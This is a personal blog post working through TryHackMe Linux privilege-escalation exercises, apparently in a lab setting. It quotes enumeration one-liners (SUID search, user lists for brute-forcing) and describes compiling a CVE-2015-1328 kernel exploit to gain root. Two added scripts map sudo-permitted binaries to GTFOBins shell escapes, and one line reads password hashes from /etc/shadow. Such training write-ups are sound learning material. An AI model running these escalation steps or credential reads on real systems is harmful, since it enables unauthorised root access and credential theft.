
Thursday is here and we are continuing with the What the Shell? module on THM!
We pick up where we left off and we are now on to the practical section of the room.
We are tasked with the following questions –

PHP Web Reverse Shell –


Bind Shell –


We complete the rest of the items, but they are very similar, so we choose to omit them as this post will be super long and ain’t nobody got time for that.

Next we move on to the Linux Privilege Escalation module on THM!

“The env command will show environmental variables. – The PATH variable may have a compiler or a scripting language (e.g. Python) that could be used to run code on the target system or leveraged for privilege escalation.”


“While the output can be long and a bit intimidating, it can easily be cut and converted to a useful list for brute-force attacks.”

“Remember that this will return all users, some of which are system or service users that would not be very useful. Another approach could be to grep for “home” as real users will most likely have their folders under the “home” directory.”

“find / -perm -u=s -type f 2>/dev/null: Find files with the SUID bit, which allows us to run the file with a higher privilege level than the current user.”

“Systems can also be identified by looking at the /etc/issue file. This file usually contains some information about the operating system but can easily be customized or changed. While on the subject, any file containing system information can be customized or changed. For a clearer understanding of the system, it is always good to look at all of these.”
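The enumeration commands quoted above (env/PATH, user lists from /etc/passwd, the SUID find) as an added example script; this is not code from the THM room or the original post. The passwd contents are constructed for the demo, `suid_files` takes a root directory so it can be exercised on a scratch directory instead of `/`, and the interpreter/compiler names are an assumed shortlist.

```shell
#!/bin/sh
# Added example: the quoted enumeration one-liners as reusable functions.

# Constructed sample /etc/passwd (not from a real host).
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
karen:x:1001:1001::/home/karen:/bin/bash
frank:x:1002:1002::/home/frank:/bin/bash'

# Users whose home directory sits under /home, i.e. the "grep home" idea,
# but keyed on field 6 so a service named "homeassistant" is not matched.
home_users() {
  printf '%s\n' "$1" | awk -F: '$6 ~ /^\/home\// {print $1}'
}

# Users with a real login shell: a better brute-force list than every account.
login_users() {
  printf '%s\n' "$1" | awk -F: '$7 !~ /(nologin|false)$/ {print $1}'
}

# Interpreters and compilers reachable via PATH (assumed shortlist); a compiler
# matters for source-only kernel exploits, an interpreter for scripted shells.
tooling_in_path() {
  for t in python python3 perl ruby php gcc cc; do
    command -v "$t" >/dev/null 2>&1 && echo "$t"
  done
  return 0
}

# PATH entries writable by the current user: a writable PATH directory lets you
# plant a binary that a privileged cron job or script may pick up.
writable_path_dirs() {
  echo "$PATH" | tr ':' '\n' | while read -r d; do
    [ -n "$d" ] && [ -w "$d" ] && echo "$d"
  done
  return 0
}

# SUID files below a directory; on a real target call it with "/".
# Equivalent to: find / -perm -u=s -type f 2>/dev/null
suid_files() {
  find "$1" -perm -u=s -type f 2>/dev/null
}

# Quick summary when run directly on a box.
echo "[*] home users:";      home_users "$(cat /etc/passwd 2>/dev/null)"
echo "[*] tooling in PATH:"; tooling_in_path
echo "[*] writable PATH dirs:"; writable_path_dirs
```

`suid_files /` is the slow step on a real host; everything else is instant, so run it last.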




I set up a simple Python server in order to host the exploit file so that the vulnerable machine could download it.

wget is used to transfer the file over; after this I needed to move into the /tmp directory to use the exploit.

After a quick Google search relating to CVE-2015-1328 I found this Linux kernel exploit on Exploit-DB. After transferring the file over to the vulnerable box via wget I was struggling to launch the exploit. I did a bit more digging and found that I needed to use the gcc command in order to compile the exploit; after the compilation I was able to get the exploit running and elevate my access to root as shown below.
Note – the hint regarding this via THM was advising that this exploit (the main one you find when searching and relating to CVE-2015-1328) suggested that you don’t need to compile the exploit prior to exploitation, which is another L for THM!

https://www.exploit-db.com/exploits/37292



Flag – THM-28392872729920


Using the sudo -l command allows me to see what can be run as root by the current user, which is karen; we see that find, less and nano can be run as root in this context.
We show below the different ways that the flag2.txt flag can be retrieved.

We see that the command “sudo nmap --interactive” can be run as root, which gives us the answer for question three.
https://gtfobins.github.io/gtfobins/nmap/#sudo

And finally, exploiting the sudo -l root privileges, we read Frank’s hash by running ‘sudo less /etc/shadow | grep frank’ as the karen user.
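An added example (not from the original post or GTFOBins) that parses `sudo -l` output into the list of binaries runnable as root and pairs each with the GTFOBins sudo escape used in this section. The `sudo -l` text is constructed to match what the post reports for karen (find, less, nano); the host name is a placeholder.

```shell
#!/bin/sh
# Added example: from `sudo -l` output to the matching GTFOBins escape.

# Constructed `sudo -l` output shaped like the real thing; "target" is a placeholder.
SAMPLE_SUDO_L='Matching Defaults entries for karen on target:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User karen may run the following commands on target:
    (ALL) NOPASSWD: /usr/bin/find
    (ALL) NOPASSWD: /usr/bin/less
    (ALL) NOPASSWD: /usr/bin/nano'

# Print the basename of each permitted command. Only lines starting with a
# "(runas)" spec are rules; the first absolute path on such a line is the
# binary, and anything after it is an argument restriction we ignore here.
sudo_binaries() {
  printf '%s\n' "$1" | awk '
    /^[[:space:]]*\(/ {
      for (i = 1; i <= NF; i++)
        if ($i ~ /^\//) { sub(/.*\//, "", $i); print $i; break }
    }'
}

# Shell escapes as documented on GTFOBins (sudo section) for the binaries
# this post uses. Non-zero return means "not in this shortlist".
escape_for() {
  case "$1" in
    find) echo 'sudo find . -exec /bin/sh \; -quit' ;;
    less) echo 'sudo less /etc/profile   # then type: !/bin/sh' ;;
    nano) echo 'sudo nano   # then ^R ^X and enter: reset; sh 1>&0 2>&0' ;;
    nmap) echo 'sudo nmap --interactive   # then: !sh (interactive mode exists only in old nmap releases)' ;;
    *)    return 1 ;;
  esac
}

# One line per permitted binary, with its escape or a pointer to look it up.
report() {
  sudo_binaries "$1" | while read -r bin; do
    if esc="$(escape_for "$bin")"; then
      echo "$bin: $esc"
    else
      echo "$bin: not in the shortlist, check https://gtfobins.github.io/"
    fi
  done
}

report "$SAMPLE_SUDO_L"
```

Reading /etc/shadow through `less` works because stdout is a pipe, so `less` behaves like `cat` and `grep` sees the whole file; with an interactive `sudo less /etc/shadow` you would instead use `/frank` inside the pager.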


That’s it for today but we shall get the rest of this module finished tomorrow!


Until next time & don’t sleepwalk through life!
Adiós
